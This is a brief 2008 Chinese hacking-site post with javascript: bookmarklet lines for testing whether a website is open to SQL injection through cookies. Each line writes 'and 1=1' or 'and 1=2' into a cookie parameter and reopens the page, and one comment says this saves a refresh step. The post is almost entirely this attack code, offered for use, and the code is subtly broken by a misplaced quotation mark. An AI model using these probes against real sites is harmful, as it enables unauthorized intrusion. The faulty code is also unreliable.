判断cookies注入的js语句
2008-04-28 17:16:41 www.hackbase.com 来源:vbs小铺
javascript:alert(document.cookie="参数= "+escape("参数值 and 1=1"));self.open("http://+"document.location.host+document.location.pathname);void(0); javascript:alert(document.cookie="参数= ...
javascript:alert(document.cookie="参数= "+escape("参数值 and 1=1"));self.open("http://+"document.location.host+document.location.pathname);void(0);
javascript:alert(document.cookie="参数="+escape("参数值 and 1=2"));self.open("http://+"document.location.host+document.location.pathname);void(0);
哎,还是在新窗口打开了,不过比网上流传的省了一步刷新和返回了。
javascript:alert(document.cookie="参数="+escape("参数值 and 1=2"));self.open("http://+"document.location.host+document.location.pathname);void(0);
哎,还是在新窗口打开了,不过比网上流传的省了一步刷新和返回了。
责任编辑:黑客基地
本文引用网址:









